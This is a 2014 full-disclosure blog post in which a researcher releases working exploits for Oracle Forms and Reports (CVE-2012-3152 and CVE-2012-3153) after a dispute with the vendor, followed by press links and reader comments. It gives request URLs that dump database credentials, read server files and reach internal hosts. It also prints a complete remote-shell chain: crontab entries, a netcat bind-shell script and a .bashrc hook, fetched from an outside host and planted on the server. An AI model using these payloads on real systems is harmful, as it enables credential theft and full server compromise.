Bitcoin = 13YoRYxzQo87MPPYwiqn2d6EhcufUizsLb

Metasploit module released and in production code base - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/oracle_reports_rce.rb

http://watchguardsecuritycenter.com/2014/01/31/java-ddos-botnet-wswir-episode-93/

Please join us in #vulnhub on freenode! Ethical hackers – Hacker Challenges – Fun group. Tell them @miss_sudo sent you.

UPDATE: 2/8/2014 – IBM ISS Xforce adds Oracle threat but gets the criticality rating wrong. http://xforce.iss.net/xforce/xfdb/79296 Also gets the “Unproven” wrong.

UPDATE: 2/6/2014 – Acunetix adds Oracle Reports detection module. http://www.acunetix.com/?p=11272&preview=true

UPDATE: 2/3/2014 – We are still looking for pre-patched/workaround versions of Oracle Forms and Reports <= 11g. Ideally one Linux install and one Windows install. We promise to not damage the system, exceed authorization and we will also advise on cleaning up after the tests. Please send an email to the address at the bottom of this article if you are able to help us. Thank you.

UPDATE 1/30/2014 – I want to make it clear to everyone that releasing these exploits doesn’t make me smile or giggle. In fact, just the opposite. Just thinking about doing this had my stomach in knots. But this had to be done to get a vendor to take serious vulnerabilities seriously which in turn will help protect it’s customers in the future.

Also, don’t say I didn’t warn people about this. http://storify.com/miss_sudo/oracle-reports-exploit-advanced-warnings

Also, chills just ran up my spine as I just realized both vulnerabilities might be wormable. Both allow executing remote code. An Oracle botnet. ugh

Metasploit module to be released soonhttps://github.com/rapid7/metasploit-framework/pull/2931

UPDATE 1/29/2014 – We need a vulnerable development install to test metasploit exploits. Please let me know if you have such an environment.

UPDATE: 1/28/2014 – First exploit released https://twitter.com/Mekanismen_/status/428256900841353216 on github https://github.com/Mekanismen/pwnacle-fusion

UPDATE: 1/27/2014 – To those who are writing articles about this, please use NI @root as the organization and not my current employer. Thank you. Also, changed the format to full width due to formatting errors. I will fix this later.

 

Proof of concept for CVE-3153 using Shodan via @felmoltor

I am releasing three exploits to the public domain. After working with Oracle starting about 2 years ago, they refused to treat these vulnerabilities as serious and didn’t appropriately address them. If you give a vulnerability a rating of medium/low it is likely not going to get any attention drawn to it by those who manage Oracle servers. I showed Oracle the videos of getting a remote shell on one of their vulnerable systems and they didn’t budge from their current stance. So, in the spirit of holding vendors accountable to how they handle vulnerabilities, I am now lighting a match and catching the Internet on fire.

First of all, these exploits are insanely stupid. So stupid that is is probably the reason why nobody else discovered them before. I know this doesn’t sound very professional but who gives you functions, on purpose, to access the file system or other systems? And nobody really caught this?

There are only videos that show exploitation of the URLPARAMETER vulnerability which can be found at the links below. Better to watch them on Youtube and expand the HD to 750/fullscreen.

http://blog.netinfiltration.com/2013/12/12/hacking-oracle-reports-11g/
http://blog.netinfiltration.com/2013/12/16/getting-a-remote-shell-on-oracle-forms-and-reports-11g/
http://blog.netinfiltration.com/2014/01/19/upcoming-exploit-release-oracle-forms-and-reports-11g/

I have tried to put the word out that these exploits are going to be released and not one high-level security news publication has released this information so that people can protect themselves.  With the recent data breaches such as Target, you would think that people would take this seriously. Well, here you go. If you are not protected your data will likely be compromised. And it is also likely that your network will be compromised as well using various other exploits along with these.

I am releasing these to hold vendors responsible for their own vulnerabilities which includes treating the vulnerabilities with a proper criticality rating as well as taking appropriate action to protect users of their product. I have wen abobe and beyond responsible disclosure here.

First we start off with the PARSEQUERY function which exists because I don’t know why. I am not an Oracle expert, I simply see things that need to be tinkered with and tinker them. I found out that you can feed a keymap name to the PARSEQUERY function and return the database username/password@database. This alone is a serious problem. Oracle did NOT fix this vulnerability but only obscured it by disabling diagnostic output.

http://server:port/reports/rwservlet/showmap to get a list of keymaps then feed a keymap to PARSEQUERY/

Exploit code for Oracle Forms and Reports

PARSEQUERY

http://docs.oracle.com/cd/E16764_01/bi.1111/b32121/pbr_cla007.htm#i640592

Description

Use PARSEQUERY to parse an rwservlet query and display the constructed Reports Server command line.

Syntax

http://your_webserver/reports/rwservlet/parsequery[?][server=server_name][&authid=username/password]

CVE-2012-3153

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3153

Oracle Reports Developer – Version 9.0.2.0 to 10.1.2.3 [Release 9i to 10gr2]

Information in this document applies to any platform.
9iAS, 9iDS, 10G (DS and AS), and 10G AS Reports/Forms Standalone Installation

An undocumented function of the PARSEQUERY function allows you to take keymaps that are located in /reports/rwservlet/showmap and add them to the query which will allow you to dump the database passwords.

http://server:port/reports/rwservlet/parsequery?<keymap>

Results

•Original Query String(GET) :

<keymap>

•Result Reports Server Command Line
expiredays=0 report=”<keymap>.rdf” jobname=”<keymap>.rdf” desformat=HTML authid=RWUser/ destype=cache userid=account/password@database

An exploit could be written to first check the showmap file and parse the non default keymaps then run queries to grab credentials that could then be used to access various applications and/or databases.

Default keymap values that do not return passwords

barcodepaper
barcodeweb
breakbparam
charthyperlink_ias
charthyperlink_ids
distributionpaper
express
orqa
parmformjsp
pdfenhancements
report_defaultid
report_secure
run
runp
tutorial
xmldata

Any other keymap on an unpatched server should return usernames/passwords including the name of the database.

From Oracle

1) Please include references to the MOS notes that provide workarounds

for 10g in your publication. These are:

CVE-2012-3153: https://support.oracle.com/rs?type=doc&id=279683.1 and

https://support.oracle.com/rs?type=doc&id=260243.1

2) Please recommend to customers still using 10g that they upgrade to

11g.

3) Also, please note in your publication that 10g is currently not

supported.

URLPARAMETER

http://docs.oracle.com/cd/E15523_01/bi.1111/b32121/pbr_cla008.htm#RSPUB23908

http://docs.oracle.com/cd/E23943_01/bi.1111/b32121/pbr_run006.htm

If you have activated the Reports Server’s URL engine, you can send job requests to the URL engine by using the following command line options:

urlParameter identifies the URL to be placed in the cache. For example, http://www.oracle.com or a JSP report.

jobType is the name of a job type (for example, rwurl) in the server configuration file that is associated with a URL engine.

Note:

For information on activating the URL engine, refer to Section 8.6, “Configuring the URL Engine”.

For example, a request that specifies an external URL for urlParameter might look like the following:

http://your_webserver:portnum/reports/rwservlet?server=

ReportsServer+jobType=rwurl+urlParameter=”http://www.oracle.com“+destype=mail+desname=foo@bar.com+desformat=htmlcss

Alternatively, a request that specifies a JSP report for urlParameter would look like the following:

http://your_webserver:portnum/reports/rwservlet?server=ReportsServer+jobType=rwurl+destype=cache+urlParameter=”http%3A%2F%2Flocalhost%2Ffoo.jsp
%3Fuserid%3Dscott%2Ftiger@oraDB%3Fserver%3DreportsServer”

CVE-2012-3152

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3152

Oracle Reports Developer – Version 9.0.2.0 to 10.1.2.3 [Release 9i to 10gr2]

Information in this document applies to any platform.
9iAS, 9iDS, 10G (DS and AS), and 10G AS Reports/Forms Standalone Installation

Exploiting URLPARAMETER

The following protocols are allowed by default (pre 12.x and pre 11.x patched).

file
ftp
gopher|
http
https
mailto

Example: Browsing/downloading files

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+
JOBTYPE=rwurl+URLPARAMETER=%22file:///%22

This would return the root filesystem in the browser. You can modify the path to change directories or download a file. Any file the Oracle server has access to.

Example: Loading a phishing page in the browser. URL can be sent to victim. The server will reach out and grab the URL itself.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+
URLPARAMETER=%22
http://netinfiltration.com/phishing.html%22

Example: Loading a webpage on the server that is blocked by a firewall.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+
URLPARAMETER=%22
http://127.0.0.1:1156/em%22

Example: Loading another server’s webpage on the private network.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+
URLPARAMETER=%22
http://10.1.1.25%22

Example: Proxying another trusted Oracle server. You can use all protocols and scenarios.

http://server:port/reports/rwservlet?report=test.rdf+server=rep_server+desformat=html+destype=cache+
JOBTYPE=rwurl+URLPARAMETER=%22file:///%22

Now to include the exploit the University of Texas discovered on top of this.

This vulnerability really changed the original one on a massive scale. Remember that you can use all protocols in with this. Some scenarios are.

  1.  Plant phishing page targetting employees and have the server email and invite out to visit the page.
  2. Gain remote shell and then if non-password protected ssh keys exist, use those to access other systems behind the network via ssh. You can actually download the ssh keys to your local computer and access they system directly if they don’t have port 22 blocked.
  3. Directly access the database using sqlplus.sh /nolog and gain SYSDBA with no password

Example: Planting external files on local server.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/login.html+
JOBTYPE=rwurl+URLPARAMETER=%22http://
netinfiltration.com/login.html%22

Example: Gaining a remote shell

Create 3 files

  1. crontab
  2. oracleshell.sh
  3. .bashrc

Place these on a site that the Oracle server can access.

The contents of the files:

Crontab File

*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1

 

Netcat Shell Script

#!/bin/sh
myvar=`echo $RANDOM`
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
then
echo “shell already started”
else
sh $mycommand &
fi

.bashrc

# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# User specific aliases and functions
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab

The following URLS will plant the files

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/crontab+
JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/crontab%22

 

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/oracleshell.sh+
JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/oracleshell.sh%22

 

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/home/oracle/.bashrc+JOBTYPE=rwurl+
URLPARAMETER=%22http://netinfiltration.com/.bashrc%22

For the shell to spawn someone needs to log into the oracle account. Stopping a service would likely get this to happen more quickly.

There are probably a lot more scenarios you can come up with. These are some nasty vulnerabilities and with all the databreaches in the news lately, those will be shit compared to this one.

From Oracle

1) Please include references to the MOS notes that provide workarounds

for 10g in your publication. These are:

CVE-2012-3152: https://support.oracle.com/rs?type=doc&id=234993.1

2) Please recommend to customers still using 10g that they upgrade to

11g.

3) Also, please note in your publication that 10g is currently not

supported.

Dana Lane Taylor

http://netinfiltration.org
@netinfiltration
@miss_sudo
security@netinfiltration.org

News

http://threatpost.com/researcher-warns-of-critical-flaws-in-oracle-servers/103961

http://blogs.csoonline.com/network-security/2951/researcher-discloses-critical-flaws-oracle-forms-and-reports

http://searchsecurity.techtarget.com/news/2240213241/Researcher-releases-critical-Oracle-Forms-and-Reports-vulnerabilities

https://isc.sans.edu/forums/diary/Oracle+Reports+Vulnerability/17531

http://securityaffairs.co/wordpress/21805/cyber-crime/critical-vulnerabilities-oracle-servers-wild.html

http://www.securityweek.com/giving-oracle-researcher-discloses-critical-vulnerabilities-oracle-forms-and-reports

 http://adtmag.com/articles/2014/01/30/oracle-cloud-world.aspx all of your data are belong to @miss_sudo

“To the best of our knowledge an Oracle database has not been broken into for a couple of decades,” he said, “by anybody.” He earned some applause by adding, “It’s so secure [that] there are people that complain!”

Oracle systems separate the data from administrator access, Ellison pointed out, which adds to the security of the systems. “Mr. Snowden never could have gotten into an Oracle database,” he said.

But in a recent blog post from security researcher Dana Taylor claimed to have discovered two vulnerabilities in Oracle Forms and Reports, “…which affected 10.x and 11.x and possibly older versions,” and which she reported to Oracle. The company responded to her reports, she wrote in the post, by saying that these were not vulnerabilities. Oracle was unavailable for comment at press time.

 

Your thoughts here

  1. Digital Human

    Nice job ;) Thx

  2. t

    LIES!
    - oracle is unbreakable
    - everythin is approved on fd

  3. @AnonymousCow4rd

    Great Job @miss_sudo!

  4. ...

    Thanks for posting this.

    But how sad… Common Oracle, get your S**T together!

  5. good exposure and process note. great! hope oracle secure it and say thanks to you.

    • ni@root

      I don’t think Oracle likes me very much right now and I don’t blame them. So I expect no thank you from them but hope this is a wakeup call for them to take serious vulnerabilities, seriously. If Oracle keeps their current stance then instead of responsible disclosure, people will start releasing zero days. They really need to take this shit seriously.

  6. Great job! However, I am not surprised by Oracle’s response. It is incredibly frustrating to work any security issues with Oracle Corp.

    https://www.dbdr.com/potential-logging-of-e-business-suite-passwords/
    This security issue was introduced if you installed any of the CPU patches July 2012 to April 2013.
    Oracle eventually fixed it, but it took nearly a year, and even after they released the fix, they did not go back and clean up the logs.
    Getting Oracle to fess up to security issues is like pulling teeth, and getting them to fix them correctly is worse.

    Jeff Kayser
    Database Doctor, Inc.
    http://www.dbdr.com

  7. Oracle Reports 10.1.2 is bundled with Oracle E-Business Suite R12.0, R12.1, and R12.2 (latest version). It is bundled in Oracle Application Server 10.1.2 (aka Oracle Fusion Middleware 10gR2).

    If you are using Oracle Reports 10.1.2 in that context, it is supported:

    “Customers running Oracle Fusion Middleware 10gR2 and 10gR3 in the Oracle E-Business Suite version 12 internal technology stack will remain supported for the duration of the support period for Oracle E-Business Suite 12.”

    http://www.oracle.com/us/support/library/lifetime-support-applications-069216.pdf

    Page 8

    I looked for an MOS note describing how to upgrade E-Business Suite 12 to Oracle Reports 11gR1, but did not find one. As far as I know, it is not a supported configuration (yet).

    For companies running Oracle E-Business Suite 12, this is a VERY serious problem. It needs to be worked immediately by Oracle.

    Jeff Kayser
    Database Doctor, Inc.
    http://www.dbdr.com

    • ni@root

      I think what we need is to build a wiki that shows past handling of Oracle vulnerabilities by Oracle and the impact on it’s customers.

  8. ni@root

    Jeff, I think a company that sells databases and applications that house the world’s most sensitive data needs to rethink their support policy. Not everyone updates to the latest and greatest due to either cost or complexity. Thanks for sharing our own nightmare story!

Leave a Reply

Contact us

We're not around right now. But you can send us an email and we'll get back to you, asap.

Questions, issues or concerns? I'd love to help you!

Click ENTER to chat